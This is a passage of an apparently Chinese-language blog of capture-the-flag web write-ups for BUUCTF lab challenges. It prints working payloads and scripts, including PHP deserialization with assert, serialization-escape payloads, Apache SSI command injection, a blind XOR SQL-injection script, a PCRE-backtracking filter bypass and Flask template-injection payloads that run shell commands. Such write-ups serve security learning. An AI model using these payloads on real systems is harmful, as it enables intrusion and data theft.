    \u627e\u5230\u53ef\u80fd\u7684flag\u6587\u4ef6<\/p>\n\n\n\n
    \u63a5\u7740\u5c1d\u8bd5\u5229\u7528filter\u8fc7\u6ee4\u548cextract\u8986\u76d6\u5b9e\u73b0\u952e\u540d\u9003\u9038\u8bfb\u53d6\u6587\u4ef6<\/p>\n\n\n\n
    \/\/\u6784\u9020Payload\uff1a\n_SESSION[flagphp]=;S:1:\"1\";S:3:\"img\";S:20:\"ZDBnM19mMWFnLnBocA==\";}<\/code><\/pre>\n\n\n\n
    \"image-20250225150333874\"\/<\/div><\/figure>\n\n\n\n
    \u63a5\u7740\u8bfb\/d0g3_fllllllag<\/p>\n\n\n\n
    _SESSION[flagphp]=;s:1:\"1\";s:3:\"img\";s:20:\"L2QwZzNfZmxsbGxsbGFn\";}<\/code><\/pre>\n\n\n\n
    \"image-20250225150433855\"\/<\/div><\/figure>\n\n\n\n
    [NPUCTF 2020] ReadlezPHP<\/h2>\n\n\n\n
    \u67e5\u770b\u6e90\u7801\uff0c\u627e\u5230\u6587\u4ef6time.php<\/p>\n\n\n\n
    \"image-20250301213434135\"\/<\/div><\/figure>\n\n\n\n
    \u8fdb\u53bb\u53ef\u77e5\u8003\u70b9\u662fphp\u53cd\u5e8f\u5217\u5316\uff0c\u6e90\u7801\u5982\u4e0b\uff1a<\/p>\n\n\n\n
    <?php
    #error_reporting(0);
    class HelloPhp
    {
        public $a;
        public $b;
        public function __construct(){
            $this->a = \"Y-m-d h:i:s\";
            $this->b = \"date\";
        }
        public function __destruct(){
            $a = $this->a;
            $b = $this->b;
            echo $b($a);
        }
    }
    $c = new HelloPhp;
    \u200b
    if(isset($_GET['source']))
    {
        highlight_file(__FILE__);
        die(0);
    }
    \u200b
    @$ppp = unserialize($_GET[\"data\"]);<\/code><\/pre>\n\n\n\n
    \u6784\u9020payload\uff1a<\/p>\n\n\n\n
    <?php
    class HelloPhp
    {
      public $a;
      public $b;
      public function __construct(){
        $this->a = \"phpinfo()\";
        $this->b = \"assert\";
      }
      public function __destruct(){
        $a = $this->a;
        $b = $this->b;
        echo $b($a);
      }
    }
    $c = new HelloPhp;
    \u200b
    echo(serialize($c));<\/code><\/pre>\n\n\n\n
    \u5c1d\u8bd5\u5176\u4ed6\u547d\u4ee4\u90fd\u4e0d\u884c\uff0c\u597d\u50cf\u53ea\u80fd\u6267\u884cassert(phpinfo())\uff0c\u5c1d\u8bd5assert(system(‘whoami’))\u4f46\u56de\u663e\u53ea\u6709\u65f6\u95f4\u6ca1\u6709\u6240\u8981\u7684\u7ed3\u679c\uff0c\u6000\u7591\u8f93\u51fa\u88ab\u8fc7\u6ee4\uff1b\u5c1d\u8bd5\u53cd\u5f39shell\u4f46\u662fbash\u88abban\u4e86<\/p>\n\n\n\n
    \/\/\u6700\u7ec8exp\uff1a\n\/time.php?data=O:8:\"HelloPhp\":2:{s:1:\"a\";s:9:\"phpinfo()\";s:1:\"b\";s:6:\"assert\";}<\/code><\/pre>\n\n\n\n
    \u6700\u7ec8\u5728phpinfo\u4e2d\u627e\u5230flag<\/p>\n\n\n\n
    \"image-20250301215316389\"\/<\/div><\/figure>\n\n\n\n
    [De1CTF 2019] SSRF Me<\/h2>\n\n\n\n
    \u5c06\u9898\u76ee\u6240\u7ed9\u6e90\u7801\u6574\u7406\u597d\uff1a<\/p>\n\n\n\n
    #!\/usr\/bin\/env python
    # encoding=utf-8
    from flask import Flask, request
    import socket
    import hashlib
    import urllib
    import sys
    import os
    import json
    \u200b
    reload(sys)
    sys.setdefaultencoding('latin1')
    \u200b
    app = Flask(__name__)
    secret_key = os.urandom(16)  # \u4fee\u6b63\u53d8\u91cf\u540d\u62fc\u5199\u9519\u8bef
    \u200b
    class Task:
        def __init__(self, action, param, sign, ip):
            self.action = action
            self.param = param
            self.sign = sign
            self.sandbox = md5(ip)
            if not os.path.exists(self.sandbox):
                os.mkdir(self.sandbox)
    \u200b
        def Exec(self):
            result = {'code': 500}
            if self.checkSign():
                if \"scan\" in self.action:
                    # \u6267\u884c\u626b\u63cf\u64cd\u4f5c
                    with open(\".\/%s\/result.txt\" % self.sandbox, 'w') as tmpfile:
                        resp = scan(self.param)
                        tmpfile.write(resp if resp != \"Connection Timeout\" else \"\")
                    result['code'] = 200
                if \"read\" in self.action:
                    # \u8bfb\u53d6\u626b\u63cf\u7ed3\u679c
                    with open(\".\/%s\/result.txt\" % self.sandbox, 'r') as f:
                        result['code'] = 200
                        result['data'] = f.read()
                if result['code'] == 500:
                    result['data'] = \"Action Error\"
            else:
                result['msg'] = \"Sign Error\"
            return result
    \u200b
        def checkSign(self):
            return getSign(self.action, self.param) == self.sign
    \u200b
    @app.route(\"\/geneSign\")
    def geneSign():
        param = urllib.unquote(request.args.get(\"param\", \"\"))
        return getSign(\"scan\", param)  # \u56fa\u5b9a action \u4e3a \"scan\"
    \u200b
    @app.route('\/De1ta', methods=['GET', 'POST'])
    def challenge():
        action = urllib.unquote(request.cookies.get(\"action\"))
        param = urllib.unquote(request.args.get(\"param\", \"\"))
        sign = urllib.unquote(request.cookies.get(\"sign\"))
        ip = request.remote_addr
    \u200b
        if waf(param):
            return \"No Hacker!!!!\"
        
        task = Task(action, param, sign, ip)
        return json.dumps(task.Exec())
    \u200b
    @app.route('\/')
    def index():
        return open(\"code.txt\", \"r\").read()
    \u200b
    def scan(param):
        socket.setdefaulttimeout(1)
        try:
            return urllib.urlopen(param).read()[:50]
        except:
            return \"Connection Timeout\"
    \u200b
    def getSign(action, param):
        return hashlib.md5(secret_key + param + action).hexdigest()
    \u200b
    def md5(content):
        return hashlib.md5(content).hexdigest()
    \u200b
    def waf(param):
        check = param.strip().lower()
        return check.startswith((\"gopher\", \"file\"))
    \u200b
    if __name__ == '__main__':
        app.run(host='0.0.0.0', port=80, debug=False)<\/code><\/pre>\n\n\n\n
    geneSign\u8def\u7531\u901a\u8fc7getSign\u51fd\u6570\u62fc\u63a5secret_key+param+action\u5e76md5\u52a0\u5bc6\uff0c\u800c\u5728De1ta\u8def\u7531\u4e2d\u4f1a\u8c03\u7528Task\u5bf9\u4f20\u5165\u7684action\u3001sign\u8fdb\u884c\u5904\u7406<\/p>\n\n\n\n
    \u56e0\u6b64\u601d\u8def\u662f\u901a\u8fc7geneSign\u8def\u7531\u4f20\u5165param\u7684\u503c\u4e3aflag.txtread\uff08\u540e\u9762\u52a0\u4e2aread\u4f2a\u88c5\u6210action\uff09<\/p>\n\n\n\n
    \"image-20250305155247173\"\/<\/div><\/figure>\n\n\n\n
    \u7136\u540e\u5c06action\u548csign\u901a\u8fc7De1ta\u8def\u7531\u4f20\u5165<\/p>\n\n\n\n
    \"image-20250305155459931\"\/<\/div><\/figure>\n\n\n\n
    [BJDCTF 2020] EasySearch<\/h2>\n\n\n\n
    dirsearch\u626b\u51fa\u6e90\u7801\u6587\u4ef6\uff1a<\/p>\n\n\n\n
    <?php
        ob_start();
        function get_hash(){
            $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()+-';
            $random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];\/\/Random 5 times
            $content = uniqid().$random;
            return sha1($content); 
        }
        header(\"Content-Type: text\/html;charset=utf-8\");
        ***
        if(isset($_POST['username']) and $_POST['username'] != '' )
        {
            $admin = '6d0bc1';
            if ( $admin == substr(md5($_POST['password']),0,6)) {
                echo \"<script>alert('[+] Welcome to manage system')<\/script>\";
                $file_shtml = \"public\/\".get_hash().\".shtml\";
                $shtml = fopen($file_shtml, \"w\") or die(\"Unable to open file!\");
                $text = '
                ***
                ***
                <h1>Hello,'.$_POST['username'].'<\/h1>
                ***
                ***';
                fwrite($shtml,$text);
                fclose($shtml);
                ***
                echo \"[!] Header  error ...\";
            } else {
                echo \"<script>alert('[!] Failed')<\/script>\";
                
        }else
        {
        ***
        }
        ***
    ?><\/code><\/pre>\n\n\n\n
    \u5f97\u77e5\u8981\u8ba9\u5bc6\u7801\u7684md5\u503c\u7684\u524d6\u4f4d\u7b49\u4e8e6d0bc1\uff0c\u5199\u4e00\u4e2apython\u811a\u672c\u8dd1\u51fa\u6240\u9700\u8981\u7684\u5bc6\u7801\uff1a<\/p>\n\n\n\n
    import hashlib
    \u200b
    for i in range(100000000):
        md5 = hashlib.md5(str(i).encode('utf-8')).hexdigest()
        if md5[0:6] == '6d0bc1':
            print(str(i)+'\uff1a'+md5)
    \u200b<\/code><\/pre>\n\n\n\n
    \"image-20250305171006715\"\/<\/div><\/figure>\n\n\n\n
    \u9009\u4e00\u4e2a\u7528\u5373\u53ef\uff0c\u6b64\u5904\u75282020666\uff08\u51fa\u9898\u4eba\u672c\u610f\u5e94\u8be5\u5c31\u662f\u8fd9\u4e2a\u5bc6\u7801\uff09<\/p>\n\n\n\n
    \u7531\u6e90\u7801\u53ef\u4ee5\u77e5\u9053\u4e4b\u540e\u4f1a\u5f97\u5230\u4e00\u4e2aurl\uff0c\u6240\u4ee5\u7528BP\u6293\u4e00\u4e0b\u8fd4\u56de\u5305<\/p>\n\n\n\n
    \"image-20250305171229116\"\/<\/div><\/figure>\n\n\n\n
    \u8bbf\u95ee\u8be5\u5730\u5740<\/p>\n\n\n\n
    \"image-20250305171322648\"\/<\/div><\/figure>\n\n\n\n
    \u6253\u5370\u51fa\u4e86\u524d\u9762\u4f20\u5165\u7684\u7528\u6237\u540d\uff0c\u7531\u4e8eurl\u8bbf\u95ee\u7684\u6587\u4ef6\u662fshtml\uff0c\u6240\u4ee5\u8054\u60f3\u5230\u662fApache SSI\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e<\/p>\n\n\n\n
    \/\/\u6784\u9020POC\uff1a\nusername=<!--#exec cmd=\"whoami\"-->&password=2020666<\/code><\/pre>\n\n\n\n
    \"image-20250305171759539\"\/<\/div><\/figure>\n\n\n\n
    \u8bbf\u95ee\u65b0\u7684url\uff0c\u8fd4\u56dewww-data\uff0c\u8bf4\u660eSSI\u6f0f\u6d1e\u5b58\u5728\uff0c\u5f00\u59cb\u627eflag\uff0c\u76f4\u63a5ls\u5f53\u524d\u76ee\u5f55\u627e\u4e0d\u5230\uff0c\u8fd4\u56de\u4e0a\u4e00\u7ea7\u76ee\u5f55\u80fd\u627e\u5230flag\u6587\u4ef6\uff08\u60f3\u5c1d\u8bd5\u76f4\u63a5\u5199\u9a6c\uff0c\u6587\u4ef6\u662f\u521b\u5efa\u4e86\uff0c\u4f46\u6587\u4ef6\u5185\u5bb9\u6ca1\u6210\u529f\u5199\u8fdb\u53bb\uff0c\u4e0d\u77e5\u9053\u662f\u4e0d\u662f\u6709\u8fc7\u6ee4\uff0c\u4e5f\u53ef\u80fd\u662f\u6ca1\u6743\u9650\u5199\u5165\uff09<\/p>\n\n\n\n
    \"image-20250305172727464\"\/<\/div><\/figure>\n\n\n\n
    cat ..\/flag_XXXXX\u8bfb\u53d6flag<\/p>\n\n\n\n
    \"image-20250305172841583\"\/<\/div><\/figure>\n\n\n\n
    [WUSTCTF 2020] \u989c\u503c\u6210\u7ee9\u67e5\u8be2<\/h2>\n\n\n\n
    \u8fdb\u9898\u76ee\u770b\u5230\u6210\u7ee9\u67e5\u8be2\uff0c\u6d4b\u8bd5\u53d1\u73b0\u53ef\u4ee5\u7528^\u5f02\u6216<\/p>\n\n\n\n
    \"image-20250308151922616\"\/<\/div><\/figure>\n\n\n\n
    \u5c1d\u8bd5\u5f02\u6216\u6ce8\u5165\u53ef\u884c\uff0c\u6839\u636e\u56de\u663e\u77e5\u662f\u76f2\u6ce8\uff0c\u4e8e\u662f\u6784\u9020\u811a\u672c\uff1a<\/p>\n\n\n\n
    import requests
    url = \"http:\/\/[URL]\/?stunum=\"
    database = \"\"
    \u200b
    #\u7206\u6570\u636e\u5e93
    payload1=\"1^(ascii(substr((select(database())),{},1))>{})^1\"
    #\u7206\u8868\u2014\u2014\u5df2\u77e5\u6570\u636e\u5e93\u540d\u4e3actf
    payload2=\"1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='ctf')),{},1))>{})^1\"
    #\u7206\u5b57\u6bb5\u540d\u2014\u2014\u5df2\u77e5\u8868\u540d\u662fflag
    payload3 =\"1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),{},1))>{})^1\"
    #\u7206\u503c\u2014\u2014flag\u5b58\u4e8ectf\u6570\u636e\u5e93\u3001flag\u8868\u3001value\u5b57\u6bb5\u4e2d
    payload4 = \"1^(ascii(substr((select(group_concat(value))from(ctf.flag)),{},1))>{})^1\"
    \u200b
    for i in range(1,10000):
        low = 32
        high = 128
        mid = (low+high) \/\/ 2
        while(low < high):
            payload = payload1.format(i,mid)    #\u7206\u6570\u636e\u5e93
            #payload = payload2.format(i,mid)   #\u7206\u8868\u540d
            #payload = payload3.format(i,mid)   #\u7206\u5b57\u6bb5\u540d
            #payload = payload4.format(i,mid)   #\u7206\u503c
            new_url = url + payload
            response = requests.get(new_url)
            if \"Hi admin, your score is: 100\" in response.text:
                low = mid + 1
            else:
                high = mid
            mid = (low + high) \/\/ 2
        if (mid == 32 or mid == 128):
            break
        database += chr(mid)
        print(database)
    print(database)
    \u200b<\/code><\/pre>\n\n\n\n
    \u6700\u540e\u53ef\u77e5flag\u5b58\u4e8ectf\u6570\u636e\u5e93\u3001flag\u8868\u3001value\u5b57\u6bb5\u4e2d<\/p>\n\n\n\n
    [FBCTF 2019] RCEService<\/h2>\n\n\n\n
    \u8bfb\u9898\u76ee\u6e90\u7801\uff1a<\/p>\n\n\n\n
    <?php
    putenv('PATH=\/home\/rceservice\/jail');
    if (isset($_REQUEST['cmd'])) {
      $json = $_REQUEST['cmd'];
      
      if (!is_string($json)) {
        echo 'Hacking attempt detected<br\/><br\/>';
      } elseif (preg_match('\/^.*(alias|bg|bind|break|builtin|case|cd|command|compgen|complete|continue|declare|dirs|disown|echo|enable|eval|exec|exit|export|fc|fg|getopts|hash|help|history|if|jobs|kill|let|local|logout|popd|printf|pushd|pwd|read|readonly|return|set|shift|shopt|source|suspend|test|times|trap|type|typeset|ulimit|umask|unalias|unset|until|wait|while|[\\x00-\\x1FA-Z0-9!#-\\\/;-@\\[-`|~\\x7F]+).*$\/', $json)) {
        echo 'Hacking attempt detected<br\/><br\/>';
      } else {
        echo 'Attempting to run command:<br\/>';
        $cmd = json_decode($json, true)['cmd'];
        if ($cmd !== NULL) {
          system($cmd);
        } else {
          echo 'Invalid input';
        }
        echo '<br\/><br\/>';
      }
    }
    ?><\/code><\/pre>\n\n\n\n
    \u5c1d\u8bd5\u76f4\u63a5\u4f20\u5165{“cmd”:”ls”}\u53ef\u4ee5\u5f97\u5230\u6267\u884c\u7ed3\u679c<\/p>\n\n\n\n
    \"image-20250308215157753\"\/<\/div><\/figure>\n\n\n\n
    \u7531\u6e90\u7801\u77e5\u9053\u5b58\u5728\u6b63\u5219\u8868\u8fbe\u5f0f\u8fc7\u6ee4\u4e14POST\u4e5f\u53ef\u4ee5\u4f20json\u8fdb\u53bb\uff0c\u6240\u4ee5\u5c1d\u8bd5\u6784\u9020\u811a\u672c\u5229\u7528PCRE\u56de\u6eaf\u673a\u5236\u7ed5\u8fc7\u6b63\u5219\u8868\u8fbe\u5f0f\uff1a<\/p>\n\n\n\n
    import requests
    \u200b
    url = \"http:\/\/a7c80bfb-9763-4b66-bae4-baa82bfa4ffe.node5.buuoj.cn:81\/\"
    payload = '{\"cmd\":\"[\u547d\u4ee4]\",\"abc\":\"'+'a'*1000000+'\"}'
    \u200b
    res = requests.post(url,data={\"cmd\":payload})
    print(res.text)<\/code><\/pre>\n\n\n\n
    \u6b64\u65f6\u5c1d\u8bd5\u76f4\u63a5\u4ee5{“cmd”:”cat index.php”}\u8f93\u5165\u547d\u4ee4\u662f\u6ca1\u7528\u7684\uff0c\u56e0\u4e3a\u5728\u6e90\u7801\u4e2d\u4f7f\u7528\u4e86putenv\u51fd\u6570\u6539\u53d8\u4e86\u5f53\u524d\u7684\u73af\u5883\u53d8\u91cf\uff0c\u6240\u4ee5\u9700\u8981\u4f7f\u7528\u547d\u4ee4\u7684\u7edd\u5bf9\u8def\u5f84\u6765\u6267\u884c\u547d\u4ee4\uff0c\u4f8b\u5982\u6784\u9020{“cmd”:”\/bin\/cat index.php”}<\/p>\n\n\n\n
    \"image-20250308215906519\"\/<\/div><\/figure>\n\n\n\n
    \u5728\u6839\u76ee\u5f55\u548c\u5f53\u524d\u76ee\u5f55\u90fd\u6ca1\u6709\u627e\u5230flag\u6587\u4ef6\uff0c\u5c1d\u8bd5\u5728\u6e90\u7801\u7ed9\u7684\u73af\u5883\u53d8\u91cf”PATH=\/home\/rceservice\/jail”\u4e2d\u6765\u627e\uff0c\u6700\u540e\u5728\/home\/rceservice\u4e2d\u627e\u5230flag\uff0c\u4f7f\u7528\/bin\/cat\u6765\u8bfb\u53d6flag<\/p>\n\n\n\n
    \"image-20250308220227790\"\/<\/div><\/figure>\n\n\n\n
    [0CTF 2016] piapiapia<\/h2>\n\n\n\n
    dirsearch\u626b\u9664\u6e90\u7801\u6587\u4ef6www.zip\uff0c\u4e0b\u8f7d\u540e\u8fdb\u884c\u5ba1\u8ba1<\/p>\n\n\n\n
    \u767b\u5f55\u3001\u6ce8\u518c\u6ca1\u4ec0\u4e48\u95ee\u9898\uff0c\u4e3b\u8981\u662fupdate.php\u3001class.php\u548cprofile.php<\/p>\n\n\n\n
    \/\/profile.php
    <?php
        require_once('class.php');
        if($_SESSION['username'] == null) {
            die('Login First'); 
        }
        $username = $_SESSION['username'];
        $profile=$user->show_profile($username);
        if($profile  == null) {
            header('Location: update.php');
        }
        else {
            $profile = unserialize($profile);
            $phone = $profile['phone'];
            $email = $profile['email'];
            $nickname = $profile['nickname'];
            $photo = base64_encode(file_get_contents($profile['photo']));\/\/\u601d\u8def\uff1a\u4f20\u5165config.php\u4f5c\u4e3aphoto\uff0c\u4efb\u610f\u8bfb\u53d6\u6587\u4ef6
    ?><\/code><\/pre>\n\n\n\n
    \/\/update.php
    <?php
        require_once('class.php');
        if($_SESSION['username'] == null) {
            die('Login First'); 
        }
        if($_POST['phone'] && $_POST['email'] && $_POST['nickname'] && $_FILES['photo']) {
    \u200b
            $username = $_SESSION['username'];
            if(!preg_match('\/^\\d{11}$\/', $_POST['phone']))
                die('Invalid phone');
    \u200b
            if(!preg_match('\/^[_a-zA-Z0-9]{1,10}@[_a-zA-Z0-9]{1,10}\\.[_a-zA-Z0-9]{1,10}$\/', $_POST['email']))
                die('Invalid email');
            
            \/\/\u901a\u8fc7\u6570\u7ec4\u7ed5\u8fc7pre_match\uff0c\u4ece\u800c\u4e0d\u9650\u5236nickname\u7684\u8f93\u5165
            if(preg_match('\/[^a-zA-Z0-9_]\/', $_POST['nickname']) || strlen($_POST['nickname']) > 10)
                die('Invalid nickname');
    \u200b
            $file = $_FILES['photo'];
            if($file['size'] < 5 or $file['size'] > 1000000)
                die('Photo size error');
    \u200b
            move_uploaded_file($file['tmp_name'], 'upload\/' . md5($file['name']));
            $profile['phone'] = $_POST['phone'];
            $profile['email'] = $_POST['email'];
            $profile['nickname'] = $_POST['nickname'];
            $profile['photo'] = 'upload\/' . md5($file['name']);
    \u200b
            \/\/\u5229\u7528\u8be5\u5904\u7684\u5e8f\u5217\u5316\u4f20\u5165config.php\u4f5c\u4e3aphoto\u7684\u503c
            $user->update_profile($username, serialize($profile));
            echo 'Update Profile Success!<a href=\"profile.php\">Your Profile<\/a>';
        }
        else {
    ?><\/code><\/pre>\n\n\n\n
    \/\/class.php
    ...
        \/\/\u6b64\u5904\u7684filter\u8fc7\u6ee4\u4f1a\u5c06\u76ee\u6807\u5b57\u7b26\u66ff\u6362\u6210hacker\uff0c\u56e0\u6b64\u53ef\u4ee5\u5c1d\u8bd5\u5229\u75285\u4e2a\u5b57\u7b26\u7684where\uff0c\u88ab\u66ff\u6362\u540e\u6210\u4e3ahacker\uff0c\u5b57\u7b26\u6570\u75315\u53d8\u62106\uff0c\u5373\u591a\u51fa1\u4e2a\uff0c\u901a\u8fc7\u4f20\u516534\u4e2awhere\uff0c\u5c31\u4f1a\u591a\u51fa34\u4e2a\u5b57\u7b26\u7528\u4e8e\u5e8f\u5217\u5316\u9003\u9038
        public function filter($string) {
            $escape = array('\\'', '\\\\\\\\');
            $escape = '\/' . implode('|', $escape) . '\/';
            $string = preg_replace($escape, '_', $string);
    \u200b
            $safe = array('select', 'insert', 'update', 'delete', 'where');
            $safe = '\/' . implode('|', $safe) . '\/i';
            return preg_replace($safe, 'hacker', $string);
        }
        public function __tostring() {
            return __class__;
        }<\/code><\/pre>\n\n\n\n
    \u5229\u7528filter\u8fc7\u6ee4\uff0c\u901a\u8fc734\u4e2awhere\u53d8\u621034\u4e2ahacker\uff0c\u591a\u51fa34\u4e2a\u5b57\u7b26\uff0c\u4ece\u800c\u4f20\u516534\u4e2a\u5b57\u7b26”;}s:5:”photo”;s:10:”config.php”;}<\/p>\n\n\n\n
    \u7531\u4e8enickname\u6709\u5b57\u7b26\u6570\u9650\u5236\uff0c\u56e0\u6b64\u901a\u8fc7\u4f20\u5165\u6570\u7ec4\u7ed5\u8fc7preg_match<\/p>\n\n\n\n
    \/\/payload
    Content-Disposition: form-data; name=\"nickname[]\"
    \u200b
    wherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewherewhere\";}s:5:\"photo\";s:10:\"config.php\";}<\/code><\/pre>\n\n\n\n
    \u901a\u8fc7update.php\u4f20\u5165payload\uff1a<\/p>\n\n\n\n
    \"image-20250310235145850\"\/<\/div><\/figure>\n\n\n\n
    \u4f20\u5165\u540e\u8bbf\u95eeprofile.php\u83b7\u5f97config.php\u7684base64\u7f16\u7801\uff0c\u89e3\u7801\u540e\u5373\u4e3aflag<\/p>\n\n\n\n
    \"image-20250310235432051\"\/<\/div><\/figure>\n\n\n\n
    [Zer0pts 2020] Can you guess it?<\/h2>\n\n\n\n
    \u5148\u8bfb\u6e90\u7801\uff1a<\/p>\n\n\n\n
    <?php
    include 'config.php'; \/\/ FLAG is defined in config.php
    \u200b
    if (preg_match('\/config\\.php\\\/*$\/i', $_SERVER['PHP_SELF'])) {
      exit(\"I don't know what you are thinking, but I won't let you read it :)\");
    }
    \u200b
    if (isset($_GET['source'])) {
      highlight_file(basename($_SERVER['PHP_SELF']));
      exit();
    }
    \u200b
    $secret = bin2hex(random_bytes(64));
    if (isset($_POST['guess'])) {
      $guess = (string) $_POST['guess'];
      if (hash_equals($secret, $guess)) {
        $message = 'Congratulations! The flag is: ' . FLAG;
      } else {
        $message = 'Wrong.';
      }
    }
    ?><\/code><\/pre>\n\n\n\n
    \u968f\u673a64\u4f4d\u6570\u5e76hex\u7f16\u7801\u663e\u7136\u662f\u731c\u4e0d\u51fa\u7684\uff0c\u6240\u4ee5\u5173\u6ce8\u4ee3\u7801\u524d\u9762\u90e8\u5206\uff1b$_SERVER[‘PHP_SELF’]\u7528\u4e8e\u83b7\u53d6\u5f53\u524d\u6587\u4ef6\u4f4d\u7f6e\uff0c\u5373url\u7684\u7ed3\u5c3e\uff0c\u6240\u4ee5\u4e0d\u80fd\u4ee5config.php\u4f5c\u4e3aurl\u7ed3\u5c3e\uff0c\u4f46\u5982\u679c\u540e\u9762\u52a0\u4e86\u7c7b\u4f3ctest.php\u5219\u65e0\u6cd5\u5229\u7528highlight_file\u8bfb\u53d6flag\u3002\u6b64\u65f6\u6ce8\u610f\u5230highlight_file\u51fd\u6570\u4e2d\u7684basename\u51fd\u6570\uff0c\u8be5\u51fd\u6570\u5b58\u5728\u6f0f\u6d1e\uff0c\u4f1a\u5c06\u4e0d\u53ef\u8bc6\u522b\u7684ascii\u5b57\u7b26\u5220\u53bb\uff0c\u5176\u4e2d\u6c49\u5b57\u5c31\u662f\u4e0d\u53ef\u8bc6\u522b\uff0c\u56e0\u6b64\u5728config.php\/\u540e\u5199\u4e0a\u4e00\u4e2a\u4e2d\u6587\u5c31\u53ef\u4ee5\u7ed5\u8fc7preg_match\u7684\u8fc7\u6ee4\uff0c\u540c\u65f6\u6210\u529f\u5c06config.php\u4f20\u5165highlight_file\u4e2d<\/p>\n\n\n\n
    \/\/Payload\uff1a\n\/index.php\/config.php\/\u4f60\u731c\u6211\u731c\u4e0d\u731c?source<\/code><\/pre>\n\n\n\n
    \"image-20250311150934975\"\/<\/div><\/figure>\n\n\n\n
    [CSCCTF 2019 Qual] FlaskLight<\/h2>\n\n\n\n
    \u8fdb\u6765\u770b\u6e90\u7801\uff0c\u63d0\u793a\u901a\u8fc7GET\u65b9\u5f0f\u83b7\u53d6search<\/p>\n\n\n\n
    \"image-20250318221447157\"\/<\/div><\/figure>\n\n\n\n
    \u65e2\u7136\u662fFlask\u4e86\uff0c\u4f30\u8ba1\u8003\u70b9\u5c31\u662fSSTI\uff0c\u76f4\u63a5\u4f20\u5165{{5*5}}\u6d4b\u8bd5\u8bc1\u660e\u5b58\u5728SSTI<\/p>\n\n\n\n
    \"image-20250318221604223\"\/<\/div><\/figure>\n\n\n\n
    \u627e\u4e2apayload\u76f4\u63a5\u6253\uff0c\u53d1\u73b0\u8fd4\u56de\u9519\u8bef<\/p>\n\n\n\n
    \/\/Payload
    {{\"\".__class__.__mro__[2].__subclasses__()[71].__init__[%27__globals__%27][%27os%27].popen(\"ls\").read()}}<\/code><\/pre>\n\n\n\n
    \"image-20250318221755884\"\/<\/div><\/figure>\n\n\n\n
    \u5b58\u5728\u5bf9globals\u7684\u8fc7\u6ee4\uff0c\u6240\u4ee5\u5c1d\u8bd5\u62fc\u63a5\u5b57\u7b26\u5b9e\u73b0\u7ed5\u8fc7<\/p>\n\n\n\n
    \/\/Payload
    {{\"\".__class__.__mro__[2].__subclasses__()[71].__init__[%27__g%27+%27lobals__%27][%27os%27].popen(\"ls\").read()}}<\/code><\/pre>\n\n\n\n
    \"image-20250318221929863\"\/<\/div><\/figure>\n\n\n\n
    \u4fee\u6539\u547d\u4ee4\u4e3a”ls%20flasklight”\u627eflag\u6587\u4ef6<\/p>\n\n\n\n
    \"image-20250318222052536\"\/<\/div><\/figure>\n\n\n\n
    \u8bfb\u53d6\u8be5\u6587\u4ef6\u5f97\u5230flag<\/p>\n\n\n\n
    \/\/Payload
    {{\"\".__class__.__mro__[2].__subclasses__()[71].__init__[%27__g%27+%27lobals__%27][%27os%27].popen(\"cat%20flasklight\/coomme_geeeett_youur_flek\").read()}}<\/code><\/pre>\n\n\n\n
    \"image-20250318222153114\"\/<\/div><\/figure>\n","protected":false},"excerpt":{"rendered":"
    \u524d\u8a00\uff1a2023\u5e74\u7684\u6691\u5047\uff0c\u51b3\u5b9a\u8981\u6210\u4e3aCTF\u7684Web\u9ad8\u624b\uff0c\u4e8e\u662f\u5c1d\u8bd5\u731b\u5237BuuCTF\u4e0a\u7684\u9898\u76ee\uff0c\u76ee\u6807\u662fAK\u6389BuuCTF\u4e0a\u7684Web\u9898\u3002\u7531\u4e8eBuuCTF\u4e0a\u7684\u9898\u76ee\u8f83\u591a\uff0c\u6240\u4ee5\u53ea\u6311\u90e8\u5206\u9898\u76ee\u5199wp\uff08\u72e0\u72e0\u5730\u5077\u61d2\u3002 [MRCTF 2020] Ez_bypass \u6253\u5f00\u9776\u673a\u53ef\u4ee5\u76f4\u63a5\u770b\u5230\u6e90\u7801\u3002\u53ef\u77e5\u8981\u5206\u522b\u901a\u8fc7get\u65b9\u5f0f\u83b7\u53d6id\u548cgg\u7684\u503c\u5e76\u6bd4\u8f83\u5b83\u4eec\u7684md5\u503c\u662f\u5426\u76f8\u7b49\uff0c\u7136\u540e\u518d\u901a\u8fc7post\u65b9\u5f0f\u5f97\u5230\u975e\u6570\u5b57\u7684passwd\u503c\u5e76\u4e0e’1234567’\u6bd4\u8f83\u5224\u65ad\u662f\u5426\u76f8\u7b49\u3002\u9996\u5148\u7531\u4e8ephp\u662f\u5f31\u7c7b\u578b\u6bd4\u8f83\uff0c\u6240\u4ee5id\u548cgg\u7684\u95ee\u9898\u53ef\u4ee5\u901a\u8fc7md5\u78b0\u649e\u6765\u5b8c\u6210\uff0c\u4e0d\u8fc7\u4e5f\u53ef\u4ee5\u5229\u7528php\u7684\u6bd4\u8f83\u4e0d\u80fd\u5904\u7406\u6570\u7ec4\u7684\u7279\u6027\u6765\u76f4\u63a5\u7ed5\u8fc7 \u5373\uff1a ?id[]=111&gg[]=222 \u53ef\u4ee5\u770b\u5230\u7b2c\u4e00\u6b65\u5df2\u7ecf\u5b8c\u6210\u4e86\uff0c\u63a5\u4e0b\u6765\u662f\u89e3\u51b3passwd\u7684\u95ee\u9898\u3002\u65e2\u8981\u6ee1\u8db3passwd=1234567\uff0c\u53c8\u8981\u8ba9passwd\u4e0d\u662f\u6570\u5b57\uff0c\u90a3\u5c31\u57281234567\u540e\u9762\u8865\u4e00\u4e2a\u5b57\u7b26\u5c31\u597d\u4e86\u3002\u5373\uff1apasswd=1234567a \u7531\u4e8ephp\u662f\u5f31\u7c7b\u578b\u6bd4\u8f83\uff0c\u6240\u4ee5\u6b64\u65f6passwd==1234567\u6210\u7acb \u62ff\u5230flag [\u7f51\u9f0e\u676f 2020] \u9752\u9f99\u7ec4 AreUSerialz 1 